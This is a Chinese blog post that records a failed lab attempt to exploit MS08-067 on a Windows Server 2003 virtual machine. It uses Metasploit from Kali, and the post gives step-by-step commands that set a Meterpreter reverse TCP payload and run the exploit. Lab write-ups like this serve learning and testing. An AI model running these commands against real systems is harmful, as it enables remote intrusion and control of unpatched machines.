本文说明
这篇文章也是我在别的博客看到的,一想自己的Kali
已经尘封多年了,所以便有了想试试的冲动,但是本次测试并没有成功,没有成功的原因可能是漏洞已经被填了,也有可能是我操作的过程不对。
还有最最最重要的一条,本次测试是在绝对安全的环境下(由虚拟机构建的局域网环境)完成测试的。这不是教程啊,可掰(别)跟着瞎xiao(学)啊
试验环境
- 虚拟局域网,网关:192.168.101.1
- Kali Linux 2020.01,ip:192.168.101.255
- Windows Server 2003,ip:192.168.101.229
实验过程
1.先获取自己的ip地址
代码语言:txt复制kali@kali:~$ sudo ifconfig
代码语言:txt复制Microsoft Windows [版本 5.2.3790]
(C) 版权所有 1985-2003 Microsoft Corp.
C:Documents and SettingsAdministrator>ipconfig
2.获取到了以后我们互相ping一下,确认是否可以ping通
代码语言:txt复制kali@kali:~$ sudo ping 192.168.101.229
代码语言:txt复制ping 192.168.101.255
3.ok,都已经ping通了,我们初始化一下数据库
代码语言:txt复制kali@kali:~$ sudo service postgresql start
kali@kali:~$ sudo msfdb init
4.接下来我们进入msf的终端
代码语言:txt复制kali@kali:~$ sudo msfconsole
5.进去了之后我们搜索一下MS08-067模块
代码语言:txt复制msf5 > search ms08-067
6.搜索到了,我们看一下序号,然后使用它
代码语言:txt复制msf5 > use 0
7.好了,已经使用了,我们列出一下它的载荷
代码语言:txt复制msf5 exploit(windows/smb/ms08_067_netapi) > show payloads
8.我们来设置一下我们要使用的载荷,然后设置相关信息
代码语言:txt复制msf5 exploit(windows/smb/ms08_067_netapi) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf5 exploit(windows/smb/ms08_067_netapi) > set rhost 192.168.101.229
rhost => 192.168.101.229
msf5 exploit(windows/smb/ms08_067_netapi) > set lhost 192.168.101.255
lhost => 192.168.101.255
msf5 exploit(windows/smb/ms08_067_netapi) > set target 34
target => 34
msf5 exploit(windows/smb/ms08_067_netapi) > show options
9.既然都设置好了,那么我们就可以开始攻击了。
代码语言:txt复制msf5 exploit(windows/smb/ms08_067_netapi) > exploit
实验结果
然后我们来看看结果,这里的话我们可以看出no session was created
这就证明我们这次攻击是不成功的。虽然说有些小失落,但是更多的开心。我的这个Windows Server 2003镜像是在网络下载的,可以看出来这个镜像的相关漏洞已经被修复了,倘若没有修复漏洞的话,那么这个镜像流入市场,会带来多大的损失我们可想而知。
msf5 exploit(windows/smb/ms08_067_netapi) > exploit
[*] Started reverse TCP handler on 192.168.101.255:4444
[*] 192.168.101.229:445 - Attempting to trigger the vulnerability...
[*] Exploit completed, but no session was created.